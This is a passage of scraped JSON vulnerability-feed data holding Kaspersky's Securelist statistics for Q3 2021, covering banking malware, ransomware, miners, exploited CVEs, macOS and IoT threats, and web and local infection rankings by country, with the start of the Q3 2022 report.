Anti-Virus recognized 289,196,912 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 104,257 unique users.\n * Ransomware attacks were defeated on the computers of 108,323 unique users.\n * Our File Anti-Virus detected 62,577,326 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q3 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 104,257 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150303/01-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150355/02-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.4 \n2 | Tajikistan | 3.7 \n3 | Afghanistan | 3.5 \n4 | Uzbekistan | 3.0 \n5 | Yemen | 1.9 \n6 | Kazakhstan | 1.6 \n7 | Paraguay | 1.6 \n8 | Sudan | 1.6 \n9 | Zimbabwe | 1.4 \n10 | Belarus | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.7 \n2 | SpyEye | Trojan-Spy.Win32.SpyEye | 17.5 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.6 \n4 | Trickster | Trojan.Win32.Trickster | 4.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.6 \n6 | Nimnul | Virus.Win32.Nimnul | 3.0 \n7 | Gozi | Trojan-Banker.Win32.Gozi | 2.7 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 2.4 \n9 | Tinba | Trojan-Banker.Win32.Tinba | 1.5 \n10 | Cridex | Backdoor.Win32.Cridex | 1.3 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nIn Q3, the family ZeuS/Zbot (17.7%), as usual, became the most widespread family of bankers. Next came the SpyEye (17.5%) family, whose share doubled from 8.8% in the previous quarter. The Top 3 was rounded out by the CliptoShuffler family (9.6%) \u2014 one position and just 0.3 p.p. down. The families Trojan-Banker.Win32.Gozi (2.7%) and Trojan-Banker.Win32.Tinba (1.5%) have made it back into the Top 10 in Q3 \u2014 seventh and ninth places, respectively.\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Kaseya and the REvil story\n\nIn early July, the group REvil/Sodinokibi [attempted an attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) on the remote administration software Kaseya VSA, compromising several managed services providers (MSP) who used this system. Thanks to this onslaught on the supply chain, the attackers were able to infect over one thousand of the compromised MSPs' client businesses. REvil's original $70 million ransom demand in exchange for decryption of all the users hit by the attack was soon moderated to 50 million.\n\nFollowing this massive attack, law enforcement agencies stepped up their attention to REvil, so by mid-July the gang turned off their Trojan infrastructure, suspended new infections and dropped out of sight. Meanwhile, Kaseya got a universal decryptor for all those affected by the attack. [According to](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-August-4th-2021>) Kaseya, it "did not pay a ransom \u2014 either directly or indirectly through a third party". Later [it emerged](<https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html>) that the company got the decryptor and the key from the FBI.\n\nBut already in the first half of September, REvil was up and running again. [According to](<https://www.bleepingcomputer.com/news/security/revil-ransomware-is-back-in-full-attack-mode-and-leaking-data/>) the hacking forum XSS, the group's former public representative known as UNKN "disappeared", and the malware developers, failing to find him, waited awhile and restored the Trojan infrastructure from backups.\n\n#### The arrival of BlackMatter: DarkSide restored?\n\nAs we already wrote in our Q2 report, the group DarkSide folded its operations after their "too high-profile" attack on Colonial Pipeline. And now there is a "new" arrival known as BlackMatter, which, as its members [claim](<https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil>), represents the "best" of DarkSide, REvil and LockBit.\n\nFrom our analysis of the BlackMatter Trojan's executable we conclude that most likely it was built using DarkSide's source codes.\n\n#### Q3 closures\n\n * Europol and the Ukrainian police have [arrested](<https://www.europol.europa.eu/newsroom/news/ransomware-gang-arrested-in-ukraine-europol's-support>) two members of an unnamed ransomware gang. The only detail made known is that the ransom demands amounted to \u20ac5 to \u20ac70 million.\n * Following its attack on Washington DC's Metropolitan Police Department, the group Babuk folded (or just suspended) its operations and published an archive containing the Trojan's source code, build tools and keys for some of the victims.\n * At the end of August, Ragnarok (not to be confused with RagnarLocker) suddenly called it a day, deleted all their victims' info from their portal and published the master key for decryption. The group gave no reasons for this course of action.\n\n#### Exploitation of vulnerabilities and new attack methods\n\n * The group HelloKitty used to distribute its ransomware by exploiting the vulnerability CVE-2019-7481 in SonicWall gateways.\n * Magniber and Vice Society penetrated the target systems by exploiting the vulnerabilities from the PrintNightmare family (CVE-2021-1675, CVE-2021-34527, CVE-2021-36958).\n * The group LockFile exploited ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to penetrate the victim's network; for lateral expansion they relied on the new PetitPotam attack that gained control of the domain controller.\n * The group Conti also used ProxyShell exploits for its attacks.\n\n### Number of new ransomware modifications\n\nIn Q3 2021, we detected 11 new ransomware families and 2,486 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q3 2020 \u2014 Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150433/03-en-ru-es-malware-report-q3-2021-pc-graphs.png>))_\n\n## Number of users attacked by ransomware Trojans\n\nIn Q3 2021, Kaspersky products and technologies protected 108,323 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150459/04-en-malware-report-q3-2021-pc-graphs.png>))_\n\n## Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150535/05-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.98 \n2 | Uzbekistan | 0.59 \n3 | Bolivia | 0.55 \n4 | Pakistan | 0.52 \n5 | Myanmar | 0.51 \n6 | China | 0.51 \n7 | Mozambique | 0.51 \n8 | Nepal | 0.48 \n9 | Indonesia | 0.47 \n10 | Egypt | 0.45 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n## Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 27.67% \n2 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 17.37% \n3 | WannaCry | Trojan-Ransom.Win32.Wanna | 11.84% \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.78% \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.58% \n6 | (generic verdict) | Trojan-Ransom.Win32.Phny | 5.57% \n7 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.65% \n8 | (generic verdict) | Trojan-Ransom.Win32.Agent | 2.04% \n9 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.07% \n10 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.04% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2021, Kaspersky solutions detected 46,097 new modifications of miners.\n\n_Number of new miner modifications, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150605/06-en-malware-report-q3-2021-pc-graphs.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks using miners on the computers of 322,131 unique users of Kaspersky products worldwide. And while during Q2 the number of attacked users gradually decreased, the trend was reversed in July and August 2021. With slightly over 140,000 unique users attacked by miners in July, the number of potential victims almost reached 150,000 in September.\n\n_Number of unique users attacked by miners, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150635/07-en-malware-report-q3-2021-pc-graphs.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150710/08-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.41 \n2 | Rwanda | 2.26 \n3 | Myanmar | 2.22 \n4 | Uzbekistan | 1.61 \n5 | Ecuador | 1.47 \n6 | Pakistan | 1.43 \n7 | Tanzania | 1.40 \n8 | Mozambique | 1.34 \n9 | Kazakhstan | 1.34 \n10 | Azerbaijan | 1.27 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\n### Quarter highlights\n\nMuch clamor was caused in Q3 by a whole new family of vulnerabilities in Microsoft Windows printing subsystem, one already known to the media as PrintNightmare: [CVE-2021-1640](<https://nvd.nist.gov/vuln/detail/CVE-2021-1640>), [CVE-2021-26878](<https://nvd.nist.gov/vuln/detail/CVE-2021-26878>), [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>), [CVE-2021-36947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36947>), [CVE-2021-34483](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>). All those vulnerabilities allow for local escalation of privileges or remote execution of commands with system rights and, as they require next to nothing for exploitation, they are often used by popular mass infection tools. To fix them, several Microsoft patches are required.\n\nThe vulnerability known as PetitPotam proved no less troublesome. It allows an unprivileged user to take control of a Windows domain computer \u2014 or even a domain controller \u2014 provided the Active Directory certificate service is present and active.\n\nIn the newest OS Windows 11, even before its official release, the vulnerability [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>) was detected and dubbed HiveNightmare/SeriousSam. It allows an unprivileged user to copy all the registry threads, including SAM, through the shadow copy mechanism, potentially exposing passwords and other critical data.\n\nIn Q3, attackers greatly favored exploits targeting the vulnerabilities ProxyToken, ProxyShell and ProxyOracle ([CVE-2021-31207](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>), [CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>), [CVE-2021-31195](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195>), [CVE-2021-31196](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>)). If exploited in combination, these open full control of mail servers managed by Microsoft Exchange Server. We already covered [similar vulnerabilities](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) \u2014 for instance, they were used in a HAFNIUM attack, also targeting Microsoft Exchange Server.\n\nAs before, server attacks relying on brute-forcing of passwords to various network services, such as MS SQL, RDP, etc., stand out among Q3 2021 network threats. Attacks using the exploits EternalBlue, EternalRomance and similar are as popular as ever. Among the new ones is the grim vulnerability enabling remote code execution when processing the Object-Graph Navigation Language in the product Atlassian Confluence Server ([CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>)) often used in various corporate environments. Also, Pulse Connect Secure was found to contain the vulnerability [CVE-2021-22937](<https://nvd.nist.gov/vuln/detail/CVE-2021-22937>), which however requires the administrator password for it to be exploited.\n\n### Statistics\n\nAs before, exploits for Microsoft Office vulnerabilities are still leading the pack in Q3 2021 (60,68%). These are popular due to the large body of users, most of whom still use older versions of the software, thus making the attackers' job much easier. The share of Microsoft Office exploits increased by almost 5 p.p. from the previous quarter. Among other things, it was due to the fact that the new vulnerability [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>) was discovered in the wild, instantly employed to compromise user machines. The attacker can exploit it by using the standard functionality that allows office documents to download templates, implemented with the help of special ActiveX components. There is no proper validation of the processed data during the operation, so any malicious code can be downloaded. As you are reading this, the relevant security update is already available.\n\nThe way individual Microsoft Office vulnerabilities are ranked by the number of detections does not change much with time: the first positions are still shared by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), with another popular vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) not far behind. We already covered these many times \u2014 all the above-mentioned vulnerabilities execute commands on behalf of the user and infect the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151038/09-en-malware-report-q3-2021-pc-graphs.png>))_\n\nThe share of exploits for the popular browsers fell by 3 p.p. from the previous reporting period to 25.57% in Q3. In the three months covered by the report several vulnerabilities were discovered in Google Chrome browser and its script engine V8 \u2014 some of them in the wild. Among these, the following JavaScript engine vulnerabilities stand out: [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>) (type confusion error corrupting the heap memory), [CVE-2021-30632](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) (out-of-bounds write in V8) and [CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) (use-after-free in Indexed DB). All these can potentially allow remote execution of code. But it should be remembered that for modern browsers a chain of several exploits is often required to leave the sandbox and secure broader privileges in the system. It should also be noted that with Google Chromium codebase (in particular the Blink component and V8) being used in many browsers, any newly detected Google Chrome vulnerability automatically makes other browsers built with its open codebase vulnerable.\n\nThe third place if held by Google Android vulnerabilities (5.36%) \u2014 1 p.p. down from the previous period. They are followed by exploits for Adobe Flash (3.41%), their share gradually decreasing. The platform is no longer supported but is still favored by users, which is reflected in our statistics.\n\nOur ranking is rounded out by vulnerabilities for Java (2.98%), its share also noticeably lower, and Adobe PDF (1.98%).\n\n## Attacks on macOS\n\nWe will remember Q3 2021 for the two interesting revelations. The first one is the use of [malware code targeting macOS](<https://securelist.com/wildpressure-targets-macos/103072/>) as part of the WildPressure campaign. The second is the detailed [review of the previously unknown FinSpy implants](<https://securelist.com/finspy-unseen-findings/104322/>) for macOS.\n\nSpeaking of the most widespread threats detected by Kaspersky security solutions for macOS, most of our Top 20 ranking positions are occupied by various adware apps. Among the noteworthy ones is Monitor.OSX.HistGrabber.b (second place on the list) \u2014 this potentially unwanted software sends user browser history to its owners' servers.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 13.22 \n2 | Monitor.OSX.HistGrabber.b | 11.19 \n3 | AdWare.OSX.Pirrit.ac | 10.31 \n4 | AdWare.OSX.Pirrit.o | 9.32 \n5 | AdWare.OSX.Bnodlero.at | 7.43 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.22 \n7 | AdWare.OSX.Pirrit.gen | 6.41 \n8 | AdWare.OSX.Cimpli.m | 6.29 \n9 | AdWare.OSX.Bnodlero.bg | 6.13 \n10 | AdWare.OSX.Pirrit.ae | 5.96 \n11 | AdWare.OSX.Agent.gen | 5.65 \n12 | AdWare.OSX.Pirrit.aa | 5.39 \n13 | Trojan-Downloader.OSX.Agent.h | 4.49 \n14 | AdWare.OSX.Bnodlero.ay | 4.18 \n15 | AdWare.OSX.Ketin.gen | 3.56 \n16 | AdWare.OSX.Ketin.h | 3.46 \n17 | Backdoor.OSX.Agent.z | 3.45 \n18 | Trojan-Downloader.OSX.Lador.a | 3.06 \n19 | AdWare.OSX.Bnodlero.t | 2.80 \n20 | AdWare.OSX.Bnodlero.ax | 2.64 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151108/10-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 3.05 \n2 | Spain | 2.85 \n3 | India | 2.70 \n4 | Mexico | 2.59 \n5 | Canada | 2.52 \n6 | Italy | 2.42 \n7 | United States | 2.37 \n8 | Australia | 2.23 \n9 | Brazil | 2.21 \n10 | United Kingdom | 2.12 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q3 2021, France took the lead having the greatest percentage of attacks on users of Kaspersky security solutions (3.05%), with the potentially unwanted software Monitor.OSX.HistGrabber being the prevalent threat there. Spain and India came in second and third, with the Pirrit family adware as their prevalent threat.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2021, most of the devices that attacked Kaspersky honeypots did so using the Telnet protocol. Just less than a quarter of all devices attempted brute-forcing our traps via SSH.\n\nTelnet | 76.55% \n---|--- \nSSH | 23.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2021_\n\nThe statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 84.29% \n---|--- \nSSH | 15.71% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 39.48 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 20.67 \n3 | Backdoor.Linux.Agent.bc | 10.00 \n4 | Backdoor.Linux.Mirai.ba | 8.65 \n5 | Trojan-Downloader.Shell.Agent.p | 3.50 \n6 | Backdoor.Linux.Gafgyt.a | 2.52 \n7 | RiskTool.Linux.BitCoinMiner.b | 1.69 \n8 | Backdoor.Linux.Ssh.a | 1.23 \n9 | Backdoor.Linux.Mirai.ad | 1.20 \n10 | HackTool.Linux.Sshbru.s | 1.12 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q3 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q3-2021/104796/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2021, Kaspersky solutions blocked 1,098,968,315 attacks launched from online resources located across the globe. Web Anti-Virus recognized 289,196,912 unique URLs as malicious.\n\n_Distribution of web-attack sources by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151328/13-en-malware-report-q3-2021-pc-graphs-1.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Tunisia | 27.15 \n2 | Syria | 17.19 \n3 | Yemen | 17.05 \n4 | Nepal | 15.27 \n5 | Algeria | 15.27 \n6 | Macao | 14.83 \n7 | Belarus | 14.50 \n8 | Moldova | 13.91 \n9 | Madagascar | 13.80 \n10 | Serbia | 13.48 \n11 | Libya | 13.13 \n12 | Mauritania | 13.06 \n13 | Mongolia | 13.06 \n14 | India | 12.89 \n15 | Palestine | 12.79 \n16 | Sri Lanka | 12.76 \n17 | Ukraine | 12.39 \n18 | Estonia | 11.61 \n19 | Tajikistan | 11.44 \n20 | Qatar | 11.14 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 8.72% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151358/14-en-malware-report-q3-2021-pc-graphs.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2021, our File Anti-Virus detected **62,577,326** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Turkmenistan | 47.42 \n2 | Yemen | 44.27 \n3 | Ethiopia | 42.57 \n4 | Tajikistan | 42.51 \n5 | Uzbekistan | 40.41 \n6 | South Sudan | 40.15 \n7 | Afghanistan | 40.07 \n8 | Cuba | 38.20 \n9 | Bangladesh | 36.49 \n10 | Myanmar | 35.96 \n11 | Venezuela | 35.20 \n12 | China | 35.16 \n13 | Syria | 34.64 \n14 | Madagascar | 33.49 \n15 | Rwanda | 33.06 \n16 | Sudan | 33.01 \n17 | Benin | 32.68 \n18 | Burundi | 31.88 \n19 | Laos | 31.70 \n20 | Cameroon | 31.28 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151433/15-en-malware-report-q3-2021-pc-graphs.png>))_\n\nOn average worldwide, **Malware-class** local threats were recorded on 15.14% of users' computers at least once during the quarter. Russia scored 14.64% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution in Q3 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2019-7481", "CVE-2021-1640", "CVE-2021-1675", "CVE-2021-22937", "CVE-2021-26084", "CVE-2021-26878", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34483", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-36934", "CVE-2021-36936", "CVE-2021-36947", "CVE-2021-36958", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "href": "https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-30T12:08:22", "description": "\n\n * [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>)\n * **IT threat evolution in Q3 2022. Non-mobile statistics**\n * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2022:\n\n * Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.\n * Web Anti-Virus recognized 251,288,987 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.\n * Ransomware attacks were defeated on the computers of 72,941 unique users.\n * Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Number of users attacked by banking malware\n\nIn Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_\n\n### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 \n3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 \n4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 \n5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 \n6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 \n7 | RTM | Trojan-Banker.Win32.RTM | 1.9 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 \n9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of financial malware attacks\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.7 \n2 | Afghanistan | 4.6 \n3 | Paraguay | 2.8 \n4 | Tajikistan | 2.8 \n5 | Yemen | 2.3 \n6 | Sudan | 2.3 \n7 | China | 2.0 \n8 | Switzerland | 2.0 \n9 | Egypt | 1.9 \n10 | Venezuela | 1.8 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nThe third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leakage to one of their developers' personal initiative, not the group's getting hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. Similarly to other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.\n\nMass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over SMB protocol and protected by a weak account password. The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.\n\nThe United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the 